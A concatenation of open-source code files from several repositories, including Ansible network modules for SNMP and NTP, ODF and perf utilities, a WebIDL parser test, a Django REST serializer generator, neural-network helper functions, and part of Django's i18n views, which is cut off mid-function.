cmd += " acl %s" % acl_number
return cmd
def delete_snmp_v3_group(self, **kwargs):
""" Delete snmp v3 group operation """
module = kwargs["module"]
group_name = module.params['group_name']
security_level = module.params['security_level']
acl_number = module.params['acl_number']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
conf_str = CE_DELETE_SNMP_V3_GROUP_HEADER % (
group_name, security_level)
if acl_number:
conf_str += "<aclNumber>%s</aclNumber>" % acl_number
if read_view:
conf_str += "<readViewName>%s</readViewName>" % read_view
if write_view:
conf_str += "<writeViewName>%s</writeViewName>" % write_view
if notify_view:
conf_str += "<notifyViewName>%s</notifyViewName>" % notify_view
conf_str += CE_DELETE_SNMP_V3_GROUP_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if "<ok/>" not in recv_xml:
module.fail_json(msg='Error: Delete snmp v3 group failed.')
if security_level == "noAuthNoPriv":
security_level_cli = "noauthentication"
elif security_level == "authentication":
security_level_cli = "authentication"
elif security_level == "privacy":
security_level_cli = "privacy"
cmd = "undo snmp-agent group v3 %s %s" % (
group_name, security_level_cli)
return cmd
def main():
""" main function """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
acl_number=dict(type='str'),
community_name=dict(type='str', no_log=True),
access_right=dict(choices=['read', 'write']),
community_mib_view=dict(type='str'),
group_name=dict(type='str'),
security_level=dict(
choices=['noAuthNoPriv', 'authentication', 'privacy']),
read_view=dict(type='str'),
write_view=dict(type='str'),
notify_view=dict(type='str')
)
argument_spec.update(ce_argument_spec)
required_together = [("community_name", "access_right"), ("security_level", "group_name")]
module = AnsibleModule(
argument_spec=argument_spec,
required_together=required_together,
supports_check_mode=True
)
changed = False
proposed = dict()
existing = dict()
end_state = dict()
updates = []
state = module.params['state']
acl_number = module.params['acl_number']
community_name = module.params['community_name']
community_mib_view = module.params['community_mib_view']
access_right = module.params['access_right']
group_name = module.params['group_name']
security_level = module.params['security_level']
read_view = module.params['read_view']
write_view = module.params['write_view']
notify_view = module.params['notify_view']
snmp_community_obj = SnmpCommunity()
if not snmp_community_obj:
module.fail_json(msg='Error: Init module failed.')
snmp_community_rst = snmp_community_obj.check_snmp_community_args(
module=module)
snmp_v3_group_rst = snmp_community_obj.check_snmp_v3_group_args(
module=module)
# get proposed
proposed["state"] = state
if acl_number:
proposed["acl_number"] = acl_number
if community_name:
proposed["community_name"] = community_name
if community_mib_view:
proposed["community_mib_view"] = community_mib_view
if access_right:
proposed["access_right"] = access_right
if group_name:
proposed["group_name"] = group_name
if security_level:
proposed["security_level"] = security_level
if read_view:
proposed["read_view"] = read_view
if write_view:
proposed["write_view"] = write_view
if notify_view:
proposed["notify_view"] = notify_view
# state exist snmp community config
exist_tmp = dict()
for item in snmp_community_rst:
if item != "need_cfg":
exist_tmp[item] = snmp_community_rst[item]
if exist_tmp:
existing["snmp community"] = exist_tmp
# state exist snmp v3 group config
exist_tmp = dict()
for item in snmp_v3_group_rst:
if item != "need_cfg":
exist_tmp[item] = snmp_v3_group_rst[item]
if exist_tmp:
existing["snmp v3 group"] = exist_tmp
if state == "present":
if snmp_community_rst["need_cfg"]:
if len(snmp_community_rst["community_info"]) != 0:
cmd = snmp_community_obj.merge_snmp_community(module=module)
changed = True
updates.append(cmd)
else:
cmd = snmp_community_obj.create_snmp_community(module=module)
changed = True
updates.append(cmd)
if snmp_v3_group_rst["need_cfg"]:
if len(snmp_v3_group_rst["group_info"]):
cmd = snmp_community_obj.merge_snmp_v3_group(module=module)
changed = True
updates.append(cmd)
else:
cmd = snmp_community_obj.create_snmp_v3_group(module=module)
changed = True
updates.append(cmd)
else:
if snmp_community_rst["need_cfg"]:
cmd = snmp_community_obj.delete_snmp_community(module=module)
changed = True
updates.append(cmd)
if snmp_v3_group_rst["need_cfg"]:
cmd = snmp_community_obj.delete_snmp_v3_group(module=module)
changed = True
updates.append(cmd)
# state end snmp community config
snmp_community_rst = snmp_community_obj.check_snmp_community_args(
module=module)
end_tmp = dict()
for item in snmp_community_rst:
if item != "need_cfg":
exist_tmp[item] = snmp_community_rst[item]
if end_tmp:
end_state["snmp community"] = end_tmp
# state exist snmp v3 group config
snmp_v3_group_rst = snmp_community_obj.check_snmp_v3_group_args(
module=module)
end_tmp = dict()
for item in snmp_v3_group_rst:
if item != "need_cfg":
exist_tmp[item] = snmp_v3_group_rst[item]
if end_tmp:
end_state["snmp v3 group"] = end_tmp
results = dict()
results['proposed'] = proposed
results['existing'] = existing
results['changed'] = changed
results['end_state'] = end_state
results['updates'] = updates
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
nozuono/calibre-webserver | src/odf/xforms.py | 96 | 1231 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2007 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
from namespaces import XFORMSNS
from element import Element
# ODF 1.0 section 11.2
# XForms is designed to be embedded in another XML format.
# Autogenerated
def Model(**args):
return Element(qname = (XFORMSNS,'model'), **args)
def Instance(**args):
return Element(qname = (XFORMSNS,'instance'), **args)
def Bind(**args):
return Element(qname = (XFORMSNS,'bind'), **args)
| gpl-3.0 |
srsdanitest/stockacercloudmobilekernel | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py | 12527 | 1935 | # Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <[email protected]>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
| gpl-2.0 |
g-k/servo | components/script/dom/bindings/codegen/parser/tests/test_typedef.py | 106 | 1874 | def WebIDLTest(parser, harness):
parser.parse("""
typedef long mylong;
typedef long? mynullablelong;
interface Foo {
const mylong X = 5;
const mynullablelong Y = 7;
const mynullablelong Z = null;
void foo(mylong arg);
};
""")
results = parser.finish()
harness.check(results[2].members[1].type.name, "Long",
"Should expand typedefs")
parser = parser.reset()
threw = False
try:
parser.parse("""
typedef long? mynullablelong;
interface Foo {
void foo(mynullablelong? Y);
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw, "Should have thrown on nullable inside nullable arg.")
parser = parser.reset()
threw = False
try:
parser.parse("""
typedef long? mynullablelong;
interface Foo {
const mynullablelong? X = 5;
};
""")
results = parser.finish()
except:
threw = True
harness.ok(threw, "Should have thrown on nullable inside nullable const.")
parser = parser.reset()
threw = False
try:
parser.parse("""
interface Foo {
const mynullablelong? X = 5;
};
typedef long? mynullablelong;
""")
results = parser.finish()
except:
threw = True
harness.ok(threw,
"Should have thrown on nullable inside nullable const typedef "
"after interface.")
parser = parser.reset()
parser.parse("""
interface Foo {
const mylong X = 5;
};
typedef long mylong;
""")
results = parser.finish()
harness.check(results[0].members[0].type.name, "Long",
"Should expand typedefs that come before interface")
| mpl-2.0 |
PriceChild/ansible | lib/ansible/modules/network/nxos/nxos_ntp.py | 19 | 13134 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: nxos_ntp
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages core NTP configuration.
description:
- Manages core NTP configuration.
author:
- Jason Edelman (@jedelman8)
options:
server:
description:
- Network address of NTP server.
required: false
default: null
peer:
description:
- Network address of NTP peer.
required: false
default: null
key_id:
description:
- Authentication key identifier to use with
given NTP server or peer.
required: false
default: null
prefer:
description:
- Makes given NTP server or peer the preferred
NTP server or peer for the device.
required: false
default: null
choices: ['enabled', 'disabled']
vrf_name:
description:
- Makes the device communicate with the given
NTP server or peer over a specific VRF.
required: false
default: null
source_addr:
description:
- Local source address from which NTP messages are sent.
required: false
default: null
source_int:
description:
- Local source interface from which NTP messages are sent.
Must be fully qualified interface name.
required: false
default: null
state:
description:
- Manage the state of the resource.
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# Set NTP Server with parameters
- nxos_ntp:
server: 1.2.3.4
key_id: 32
prefer: enabled
host: "{{ inventory_hostname }}"
username: "{{ un }}"
password: "{{ pwd }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"address": "2.2.2.2", "key_id": "48",
"peer_type": "server", "prefer": "enabled",
"source": "3.3.3.3", "source_type": "source"}
existing:
description:
- k/v pairs of existing ntp server/peer
type: dict
sample: {"address": "2.2.2.2", "key_id": "32",
"peer_type": "server", "prefer": "enabled",
"source": "ethernet2/1", "source_type": "source-interface"}
end_state:
description: k/v pairs of ntp info after module execution
returned: always
type: dict
sample: {"address": "2.2.2.2", "key_id": "48",
"peer_type": "server", "prefer": "enabled",
"source": "3.3.3.3", "source_type": "source"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["ntp server 2.2.2.2 prefer key 48",
"no ntp source-interface ethernet2/1", "ntp source 3.3.3.3"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from ansible.module_utils.nxos import get_config, load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netcfg import CustomNetworkConfig
import re
def execute_show_command(command, module, command_type='cli_show'):
if module.params['transport'] == 'cli':
if 'show run' not in command:
command += ' | json'
cmds = [command]
body = run_commands(module, cmds)
elif module.params['transport'] == 'nxapi':
cmds = [command]
body = run_commands(module, cmds)
return body
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_ntp_source(module):
source_type = None
source = None
command = 'show run | inc ntp.source'
output = execute_show_command(command, module, command_type='cli_show_ascii')
if output:
try:
if 'interface' in output[0]:
source_type = 'source-interface'
else:
source_type = 'source'
source = output[0].split()[2].lower()
except AttributeError:
source_type = None
source = None
return source_type, source
def get_ntp_peer(module):
command = 'show run | inc ntp.(server|peer)'
ntp_peer_list = []
ntp = execute_show_command(
command, module, command_type='cli_show_ascii')
if ntp:
ntp = ntp[0]
ntp_regex = (
".*ntp\s(server\s(?P<address>\S+)|peer\s(?P<peer_address>\S+))"
"\s*((?P<prefer>prefer)\s*)?(use-vrf\s(?P<vrf_name>\S+)\s*)?"
"(key\s(?P<key_id>\d+))?.*"
)
split_ntp = ntp.splitlines()
for peer_line in split_ntp:
ntp_peer = {}
try:
peer_address = None
vrf_name = None
prefer = None
key_id = None
match_ntp = re.match(ntp_regex, peer_line, re.DOTALL)
group_ntp = match_ntp.groupdict()
address = group_ntp["address"]
peer_address = group_ntp['peer_address']
prefer = group_ntp['prefer']
vrf_name = group_ntp['vrf_name']
key_id = group_ntp['key_id']
if prefer is not None:
prefer = 'enabled'
else:
prefer = 'disabled'
if address is not None:
peer_type = 'server'
elif peer_address is not None:
peer_type = 'peer'
address = peer_address
args = dict(peer_type=peer_type, address=address, prefer=prefer,
vrf_name=vrf_name, key_id=key_id)
ntp_peer = dict((k, v) for k, v in args.items())
ntp_peer_list.append(ntp_peer)
except AttributeError:
ntp_peer_list = []
return ntp_peer_list
def get_ntp_existing(address, peer_type, module):
peer_dict = {}
peer_server_list = []
peer_list = get_ntp_peer(module)
for peer in peer_list:
if peer['address'] == address:
peer_dict.update(peer)
else:
peer_server_list.append(peer)
source_type, source = get_ntp_source(module)
if (source_type is not None and source is not None):
peer_dict['source_type'] = source_type
peer_dict['source'] = source
return (peer_dict, peer_server_list)
def set_ntp_server_peer(peer_type, address, prefer, key_id, vrf_name):
command_strings = []
if prefer:
command_strings.append(' prefer')
if key_id:
command_strings.append(' key {0}'.format(key_id))
if vrf_name:
command_strings.append(' use-vrf {0}'.format(vrf_name))
command_strings.insert(0, 'ntp {0} {1}'.format(peer_type, address))
command = ''.join(command_strings)
return command
def config_ntp(delta, existing):
address = delta.get('address', existing.get('address'))
peer_type = delta.get('peer_type', existing.get('peer_type'))
vrf_name = delta.get('vrf_name', existing.get('vrf_name'))
key_id = delta.get('key_id', existing.get('key_id'))
prefer = delta.get('prefer', existing.get('prefer'))
source_type = delta.get('source_type')
source = delta.get('source')
if prefer:
if prefer == 'enabled':
prefer = True
elif prefer == 'disabled':
prefer = False
if source:
source_type = delta.get('source_type', existing.get('source_type'))
ntp_cmds = []
if peer_type:
ntp_cmds.append(set_ntp_server_peer(
peer_type, address, prefer, key_id, vrf_name))
if source:
existing_source_type = existing.get('source_type')
existing_source = existing.get('source')
if existing_source_type and source_type != existing_source_type:
ntp_cmds.append('no ntp {0} {1}'.format(existing_source_type, existing_source))
ntp_cmds.append('ntp {0} {1}'.format(source_type, source))
return ntp_cmds
def main():
argument_spec = dict(
server=dict(type='str'),
peer=dict(type='str'),
key_id=dict(type='str'),
prefer=dict(type='str', choices=['enabled', 'disabled']),
vrf_name=dict(type='str'),
source_addr=dict(type='str'),
source_int=dict(type='str'),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=[
['server','peer'],
['source_addr','source_int']],
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
server = module.params['server'] or None
peer = module.params['peer'] or None
key_id = module.params['key_id']
prefer = module.params['prefer']
vrf_name = module.params['vrf_name']
source_addr = module.params['source_addr']
source_int = module.params['source_int']
state = module.params['state']
if source_int is not None:
source_int = source_int.lower()
if server:
peer_type = 'server'
address = server
elif peer:
peer_type = 'peer'
address = peer
else:
peer_type = None
address = None
source_type = None
source = None
if source_addr:
source_type = 'source'
source = source_addr
elif source_int:
source_type = 'source-interface'
source = source_int
if key_id or vrf_name or prefer:
if not server and not peer:
module.fail_json(
msg='Please supply the server or peer parameter')
args = dict(peer_type=peer_type, address=address, key_id=key_id,
prefer=prefer, vrf_name=vrf_name, source_type=source_type,
source=source)
proposed = dict((k, v) for k, v in args.items() if v is not None)
existing, peer_server_list = get_ntp_existing(address, peer_type, module)
end_state = existing
changed = False
commands = []
if state == 'present':
delta = dict(set(proposed.items()).difference(existing.items()))
if delta:
command = config_ntp(delta, existing)
if command:
commands.append(command)
elif state == 'absent':
if existing.get('peer_type') and existing.get('address'):
command = 'no ntp {0} {1}'.format(
existing['peer_type'], existing['address'])
if command:
commands.append([command])
existing_source_type = existing.get('source_type')
existing_source = existing.get('source')
proposed_source_type = proposed.get('source_type')
proposed_source = proposed.get('source')
if proposed_source_type:
if proposed_source_type == existing_source_type:
if proposed_source == existing_source:
command = 'no ntp {0} {1}'.format(
existing_source_type, existing_source)
if command:
commands.append([command])
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
changed = True
load_config(module, cmds)
end_state = get_ntp_existing(address, peer_type, module)[0]
if 'configure' in cmds:
cmds.pop(0)
results = {}
results['proposed'] = proposed
results['existing'] = existing
results['updates'] = cmds
results['changed'] = changed
results['warnings'] = warnings
results['end_state'] = end_state
results['peer_server_list'] = peer_server_list
module.exit_json(**results)
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
weijia/djangoautoconf | djangoautoconf/django_rest_framework_utils/serializer_generator.py | 1 | 6042 | from django.conf.urls import url, include
from rest_framework import serializers
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
from rest_framework.serializers import ModelSerializer
from rest_framework.urlpatterns import format_suffix_patterns
from djangoautoconf.model_utils.model_reversion import add_reversion_before_save
from ufs_tools.string_tools import class_name_to_low_case
from djangoautoconf.model_utils.model_attr_utils import model_enumerator, enum_model_fields
g_exclude_field_list = []
try:
from geoposition.fields import GeopositionField
g_exclude_field_list.append(GeopositionField)
except:
pass
class ModelSerializerWithUser(ModelSerializer):
def save(self, **kwargs):
user = None
if "request" in self.context and self.context['request']:
user = self.context['request'].user
return super(ModelSerializerWithUser, self).save(user=user, **kwargs)
def get_serializer(class_inst, serializer_parent=[ModelSerializer]):
meta_class = type("Meta", tuple(), {"model": class_inst,
"fields": '__all__', # Required by new restframework
}
)
serializer_attr_dict = {"Meta": meta_class}
if hasattr(class_inst, "last_modifier"):
serializer_attr_dict['last_modifier'] = serializers.PrimaryKeyRelatedField(
read_only=True, default=serializers.CurrentUserDefault())
return type(class_inst.__name__ + "Serializer", tuple(serializer_parent),
serializer_attr_dict
)
def get_api_class(class_inst, suffix="List", parent=[ListCreateAPIView]):
serializer = get_serializer(class_inst)
api_class_name = class_inst.__name__ + suffix
return get_api_class_from_serializer(class_inst, parent, serializer, api_class_name)
class ApiClassGenerator(object):
def __init__(self, api_class_parent=[ListCreateAPIView], serializer_parent=[ModelSerializer]):
super(ApiClassGenerator, self).__init__()
self.api_class_parent = api_class_parent
self.serializer_parent = serializer_parent
self.suffix = "List"
def get_api_class(self, class_inst):
serializer = get_serializer(class_inst, self.serializer_parent)
api_class_name = class_inst.__name__ + self.suffix
res_class = get_api_class_from_serializer(class_inst, self.api_class_parent, serializer, api_class_name)
return res_class
def get_api_class_from_serializer(class_inst, parent, serializer, api_class_name):
filter_fields = []
for field in enum_model_fields(class_inst):
is_need_exclude = False
for exclude_field in g_exclude_field_list:
if type(field) is exclude_field:
is_need_exclude = True
break
if is_need_exclude:
filter_fields.append(field.name)
return type(
api_class_name,
tuple(parent),
{
"queryset": class_inst.objects.all(),
"serializer_class": serializer,
"filter_fields": filter_fields,
# "permission_classes": (permissions.IsAuthenticatedOrReadOnly, ),
}
)
def get_create_api_class(class_inst):
return get_api_class(class_inst)
def get_detail_api_class(class_inst):
"""
Example: url(r'^checklist_list/(?P<pk>[0-9]+)/$', get_detail_api_class(ChecklistTreeItem).as_view()),
:param class_inst:
:return:
"""
return get_api_class(class_inst, "Detail", [RetrieveUpdateDestroyAPIView])
class ModelProcessorBase(object):
excluded_model_names = ('MPTTModel',)
def __init__(self, url_patterns=None):
self.url_list = []
self.url_patterns = url_patterns
def get_patterns(self, models):
for model in model_enumerator(models, self.excluded_model_names):
add_reversion_before_save(model)
if hasattr(model, "objects"):
self.append_urls(model)
return self.url_list
def append_urls(self, model):
self.url_list.append(self.get_url(model))
def get_url(self, model):
pass
class SerializerUrlGenerator(ModelProcessorBase):
def append_urls(self, model):
self.url_list.append(url(r'^rest_api/%s/$' % class_name_to_low_case(model.__name__),
get_create_api_class(model).as_view()))
self.url_list.append(url(r'^rest_api/%s/(?P<pk>[0-9]+)/$' % class_name_to_low_case(model.__name__),
get_detail_api_class(model).as_view()))
def add_rest_api_urls(self, models):
if self.url_patterns is None:
raise "No url_patterns found"
self.url_patterns += self.get_patterns(models)
self.url_patterns += url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
return format_suffix_patterns(self.url_patterns)
# class FeatureApplier(object):
# default_feature_class_list = ()
#
# def __init__(self, feature_class_list=None):
# super(FeatureApplier, self).__init__()
# self.features = []
#
# if feature_class_list is None:
# feature_class_list = self.default_feature_class_list
#
# for feature in feature_class_list:
# self.add_feature(feature())
#
# def add_feature(self, feature):
# self.features.append(feature)
#
#
# class UrlPatternGenerator(FeatureApplier):
# def __init__(self, url_patterns=None, feature_class_list=None):
# super(UrlPatternGenerator, self).__init__(feature_class_list)
# self.url_patterns = url_patterns
#
# def add_urls_for(self, models):
# for feature in self.features:
# for model in model_enumerator(models, feature.excluded_model_names):
# self.append_urls(model)
# p = patterns('', *self.url_list)
# return p
#
# return self.url_patterns
| bsd-3-clause |
nobukatsu/deep-learning-from-scratch | common/functions.py | 6 | 1179 | # coding: utf-8
import numpy as np
def identity_function(x):
return x
def step_function(x):
return np.array(x > 0, dtype=np.int)
def sigmoid(x):
return 1 / (1 + np.exp(-x))
def sigmoid_grad(x):
return (1.0 - sigmoid(x)) * sigmoid(x)
def relu(x):
return np.maximum(0, x)
def relu_grad(x):
grad = np.zeros(x)
grad[x>=0] = 1
return grad
def softmax(x):
if x.ndim == 2:
x = x.T
x = x - np.max(x, axis=0)
y = np.exp(x) / np.sum(np.exp(x), axis=0)
return y.T
x = x - np.max(x) # オーバーフロー対策
return np.exp(x) / np.sum(np.exp(x))
def mean_squared_error(y, t):
return 0.5 * np.sum((y-t)**2)
def cross_entropy_error(y, t):
if y.ndim == 1:
t = t.reshape(1, t.size)
y = y.reshape(1, y.size)
# 教師データがone-hot-vectorの場合、正解ラベルのインデックスに変換
if t.size == y.size:
t = t.argmax(axis=1)
batch_size = y.shape[0]
return -np.sum(np.log(y[np.arange(batch_size), t])) / batch_size
def softmax_loss(X, t):
y = softmax(X)
return cross_entropy_error(y, t)
| mit |
h4r5h1t/django-hauthy | django/views/i18n.py | 82 | 11043 | import gettext as gettext_module
import importlib
import json
import os
from django import http
from django.apps import apps
from django.conf import settings
from django.template import Context, Engine
from django.utils import six
from django.utils._os import upath
from django.utils.encoding import smart_text
from django.utils.formats import get_format, get_format_modules
from django.utils.http import is_safe_url
from django.utils.translation import (
LANGUAGE_SESSION_KEY, check_for_language, get_language, to_locale,
)
def set_language(request):
"""
Redirect to a given url while setting the chosen language in the
session or cookie. The url and the language code need to be
specified in the request parameters.
Since this view changes how the user will see the rest of the site, it must
only be accessed as a POST request. If called as a GET request, it will
redirect to the page in the request (the 'next' parameter) without changing
any state.
"""
next = request.POST.get('next', request.GET.get('next'))
if not is_safe_url(url=next, host=request.get_host()):
next = request.META.get('HTTP_REFERER')
if not is_safe_url(url=next, host=request.get_host()):
next = '/'
response = http.HttpResponseRedirect(next)
if request.method == 'POST':
lang_code = request.POST.get('language', None)
if lang_code and check_for_language(lang_code):
if hasattr(request, 'session'):
request.session[LANGUAGE_SESSION_KEY] = lang_code
else:
response.set_cookie(settings.LANGUAGE_COOKIE_NAME, lang_code,
max_age=settings.LANGUAGE_COOKIE_AGE,
path=settings.LANGUAGE_COOKIE_PATH,
domain=settings.LANGUAGE_COOKIE_DOMAIN)
return response
def get_formats():
"""
Returns all formats strings required for i18n to work
"""
FORMAT_SETTINGS = (
'DATE_FORMAT', 'DATETIME_FORMAT', 'TIME_FORMAT',
'YEAR_MONTH_FORMAT', 'MONTH_DAY_FORMAT', 'SHORT_DATE_FORMAT',
'SHORT_DATETIME_FORMAT', 'FIRST_DAY_OF_WEEK', 'DECIMAL_SEPARATOR',
'THOUSAND_SEPARATOR', 'NUMBER_GROUPING',
'DATE_INPUT_FORMATS', 'TIME_INPUT_FORMATS', 'DATETIME_INPUT_FORMATS'
)
result = {}
for module in [settings] + get_format_modules(reverse=True):
for attr in FORMAT_SETTINGS:
result[attr] = get_format(attr)
formats = {}
for k, v in result.items():
if isinstance(v, (six.string_types, int)):
formats[k] = smart_text(v)
elif isinstance(v, (tuple, list)):
formats[k] = [smart_text(value) for value in v]
return formats
js_catalog_template = r"""
{% autoescape off %}
(function (globals) {
var django = globals.django || (globals.django = {});
{% if plural %}
django.pluralidx = function (n) {
var v={{ plural }};
if (typeof(v) == 'boolean') {
return v ? 1 : 0;
} else {
return v;
}
};
{% else %}
django.pluralidx = function (count) { return (count == 1) ? 0 : 1; };
{% endif %}
{% if catalog_str %}
/* gettext library */
django.catalog = {{ catalog_str }};
django.gettext = function (msgid) {
var value = django.catalog[msgid];
if (typeof(value) == 'undefined') {
return msgid;
} else {
return (typeof(value) == 'string') ? value : value[0];
}
};
django.ngettext = function (singular, plural, count) {
var value = django.catalog[singular];
if (typeof(value) == 'undefined') {
return (count == 1) ? singular : plural;
} else {
return value[django.pluralidx(count)];
}
};
django.gettext_noop = function (msgid) { return msgid; };
django.pgettext = function (context, msgid) {
var value = django.gettext(context + '\x04' + msgid);
if (value.indexOf('\x04') != -1) {
value = msgid;
}
return value;
};
django.npgettext = function (context, singular, plural, count) {
var value = django.ngettext(context + '\x04' + singular, context + '\x04' + plural, count);
if (value.indexOf('\x04') != -1) {
value = django.ngettext(singular, plural, count);
}
return value;
};
{% else %}
/* gettext identity library */
django.gettext = function (msgid) { return msgid; };
django.ngettext = function (singular, plural, count) { return (count == 1) ? singular : plural; };
django.gettext_noop = function (msgid) { return msgid; };
django.pgettext = function (context, msgid) { return msgid; };
django.npgettext = function (context, singular, plural, count) { return (count == 1) ? singular : plural; };
{% endif %}
django.interpolate = function (fmt, obj, named) {
if (named) {
return fmt.replace(/%\(\w+\)s/g, function(match){return String(obj[match.slice(2,-2)])});
} else {
return fmt.replace(/%s/g, function(match){return String(obj.shift())});
}
};
/* formatting library */
django.formats = {{ formats_str }};
django.get_format = function (format_type) {
var value = django.formats[format_type];
if (typeof(value) == 'undefined') {
return format_type;
} else {
return value;
}
};
/* add to global namespace */
globals.pluralidx = django.pluralidx;
globals.gettext = django.gettext;
globals.ngettext = django.ngettext;
globals.gettext_noop = django.gettext_noop;
globals.pgettext = django.pgettext;
globals.npgettext = django.npgettext;
globals.interpolate = django.interpolate;
globals.get_format = django.get_format;
}(this));
{% endautoescape %}
"""
def render_javascript_catalog(catalog=None, plural=None):
template = Engine().from_string(js_catalog_template)
indent = lambda s: s.replace('\n', '\n ')
context = Context({
'catalog_str': indent(json.dumps(
catalog, sort_keys=True, indent=2)) if catalog else None,
'formats_str': indent(json.dumps(
get_formats(), sort_keys=True, indent=2)),
'plural': plural,
})
return http.HttpResponse(template.render(context), 'text/javascript')
def get_javascript_catalog(locale, domain, packages):
default_locale = to_locale(settings.LANGUAGE_CODE)
app_configs = apps.get_app_configs()
allowable_packages = set(app_config.name for app_config in app_configs)
allowable_packages.add('django.conf')
packages = [p for p in packages if p in allowable_packages]
t = {}
paths = []
en_selected = locale.startswith('en')
en_catalog_missing = True
# paths of requested packages
for package in packages:
p = importlib.import_module(package)
path = os.path.join(os.path.dirname(upath(p.__file__)), 'locale')
paths.append(path)
# add the filesystem paths listed in the LOCALE_PATHS setting
paths.extend(list(reversed(settings.LOCALE_PATHS)))
# first load all english languages files for defaults
for path in paths:
try:
catalog = gettext_module.translation(domain, path, ['en'])
t.update(catalog._catalog)
except IOError:
pass
else:
# 'en' is the selected language and at least one of the packages
# listed in `packages` has an 'en' catalog
if en_selected:
en_catalog_missing = False
# next load the settings.LANGUAGE_CODE translations if it isn't english
if default_locale != 'en':
for path in paths:
try:
catalog = gettext_module.translation(domain, path, [default_locale])
except IOError:
catalog = None
if catalog is not None:
t.update(catalog._catalog)
# last load the currently selected language, if it isn't identical to the default.
if locale != default_locale:
# If the currently selected language is English but it doesn't have a
# translation catalog (presumably due to being the language translated
# from) then a wrong language catalog might have been loaded in the
# previous step. It needs to be discarded.
if en_selected and en_catalog_missing:
t = {}
else:
locale_t = {}
for path in paths:
try:
catalog = gettext_module.translation(domain, path, [locale])
except IOError:
catalog = None
if catalog is not None:
locale_t.update(catalog._catalog)
if locale_t:
t = locale_t
plural = None
if '' in t:
for l in t[''].split('\n'):
if l.startswith('Plural-Forms:'):
plural = l.split(':', 1)[1].strip()
if plural is not None:
# this should actually be a compiled function of a typical plural-form:
# Plural-Forms: nplurals=3; plural=n%10==1 && n%100!=11 ? 0 :
# n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2;
plural = [el.strip() for el in plural.split(';') if el.strip().startswith('plural=')][0].split('=', 1)[1]
pdict = {}
maxcnts = {}
catalog = {}
for k, v in t.items():
if k == '':
continue
